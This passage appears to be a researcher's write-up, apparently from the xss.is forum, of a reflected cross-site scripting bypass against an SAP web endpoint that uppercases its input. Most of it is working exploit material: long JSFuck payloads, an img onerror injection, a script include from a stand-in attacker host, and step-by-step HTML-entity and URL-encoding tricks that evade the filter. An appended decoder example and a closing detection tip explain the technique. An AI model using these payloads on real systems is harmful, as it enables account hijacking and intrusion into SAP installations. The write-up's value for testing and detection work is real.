]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])>.asp HTTP/2
Response:
Code:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh"      content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/"><IMG SRC=X ONERROR=[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]][([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((!![]+[])[+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+([][[]]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+!+[]]+(+[![]]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]+(+(!+[]+!+[]+!+[]+[+!+[]]))[(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([]+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]][([][[]]+[])[+!+[]]+(![]+[])[+!+[]]+((+[])[([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[
]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]+[])[+!+[]+[+!+[]]]+(!![]+[])[!+[]+!+[]+!+[]]]](!+[]+!+[]+!+[]+[!+[]+!+[]])+(![]+[])[+!+[]]+(![]+[])[!+[]+!+[]])()((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+([][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]]+[])[+!+[]+[!+[]+!+[]+!+[]]]+[+!+[]]+([+[]]+![]+[][(![]+[])[+[]]+(![]+[])[!+[]+!+[]]+(![]+[])[+!+[]]+(!![]+[])[+[]]])[!+[]+!+[]+[+[]]])>">
</head>
<body>
</body>
</html>
Image [2]

So we understand that JSFuck works; now time for the second approach. The second approach is to start an HTTP server with a file named 1.JS. I used the number 1 as the name because numbers can't be uppercased, and the uppercase of .js is .JS.

Image [3]

So now my request is:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><script%20src=http://xacker.mamkin/1.JS>.asp HTTP/2
The response is:
Code:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh"      content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/"><SCRIPT SRC=HTTP:/XACKER.MAMKIN/1.JS>">
</head>
<body>
</body>
</html>
As you can see there is 1 slash, it is http:/ instead of http://. I tried multiple bypass methods, but they didn't work. So I will leave this approach and try simpler approaches. BTW, when I open a script tag there is no 403; the 403 error comes when I close the tag. Well, now I can use HTML encoding. My request is:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img/src=x/onerror=&#112;&#114;&#105;&#110;&#116;(1)>.asp HTTP/2
The response I got is:
Code:
HTTP/2 404 Not Found
So why did I get a 404? The semicolon (;) isn't a special character. I tried to URL-encode it and send the request that way, but the response was still 404. I think that the server/web application can be configured to handle semicolons in a specific way, and this configuration may result in a 404 error for semicolon-containing URLs, regardless of encoding. Now, to understand what is happening here, I will start from scratch.

200 OK:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/">.asp HTTP/2
404 Not Found:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/&quot;&gt;.asp HTTP/2
200 OK, but the response is not decoded, it is &QUOT&GT:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/&quot&gt.asp HTTP/2
Maybe I should use numeric entities?
404 Not Found:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/&#34;&#62;.asp HTTP/2
What if I remove the ;
200 OK, okay this one seems to be working:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/&#34&#62.asp HTTP/2

Now I will go back and encode what I have to in the correct way:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img/src=x/onerror=&#112&#114&#105&#110&#116(1)>.asp HTTP/
I have 200 OK, so maybe the issue is with the img tag:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img%20src=x%20onerror=&#112&#114&#105&#110&#116(1)>.asp HTTP/2
It worked, that's great! But the issue here is that the HTML-encoded part should also be URL-encoded, otherwise & will be considered a special character. So the final request will be:
Code:
GET /SAPIrExtHelp/random/SAPIrExtHelp/random/"><img%20src=x%20onerror=%26%23112%26%23114%26%23105%26%23110%26%23116(1)>.asp HTTP/2
Response:
Code:
<html>
<head>
<meta http-equiv="content-type" content="text/html; charset=ISO-8859-1">
<meta http-equiv="refresh"      content="0; URL=/SAPIKS2/logonFromUrl.sap?null&_CLASS=RANDOM/SAPIREXTHELP/RANDOM/"><IMG SRC=X ONERROR=&#112&#114&#105&#110&#116(1)>">
</head>
<body>
</body>
</html>

Image [4]

My payload was to print xD

As a result, we now have a better payload than the one in the Nuclei template, because ours encodes only what is needed, not everything.
P.S. Tested with permission obviously.
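Why the numeric entities survive the uppercasing, as an added example that is not part of the original post: a decoder that follows the browser rules this walkthrough depends on (terminating semicolon optional, hex marker x or X), run over the payload from the Nuclei template and from the final request. The functions and the simulated uppercase-then-decode step are this example's own; the sample inputs are the ones shown above.

```javascript
// Added example (not from the original post). Decodes HTML numeric character
// references the way a browser does for the two cases the walkthrough depends
// on: a missing terminating semicolon and an uppercase hex marker (&#X..).
// The inputs are the payloads shown in the post; function names are assumptions.

// &#112  &#112;  &#x70  &#X70  (semicolon optional, as browsers accept it)
const NUMERIC_REF = /&#(?:[xX]([0-9a-fA-F]+)|([0-9]+));?/g;

function decodeNumericRefs(input) {
  return input.replace(NUMERIC_REF, (match, hex, dec) => {
    const cp = hex !== undefined ? parseInt(hex, 16) : parseInt(dec, 10);
    // browsers substitute U+FFFD for out-of-range references
    if (!Number.isFinite(cp) || cp > 0x10ffff) return "\uFFFD";
    return String.fromCodePoint(cp);
  });
}

// The transformation observed in the post: the server uppercases the path
// segment and reflects it into the page; the browser then decodes entities.
// Digits are unaffected by toUpperCase(), so &#97 still means "a" afterwards,
// and hex digits a-f become A-F, which the parser accepts just the same.
function reflectThroughUppercase(segment) {
  return decodeNumericRefs(segment.toUpperCase());
}

// Case-sensitive on purpose: JavaScript identifiers are, so ALERT( is not a call.
const JS_CALL = /\b(alert|print|eval)\s*\(/;

// Which JavaScript call, if any, would the browser actually execute?
function findJsCall(html) {
  const m = html.match(JS_CALL);
  return m ? m[1] : null;
}
```

A detection rule that inspects the raw reflected response sees only the entity-encoded text; it must decode entities, semicolon or not, before matching on the JavaScript.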

Author: grozdniyandy

Source: https://xss.is/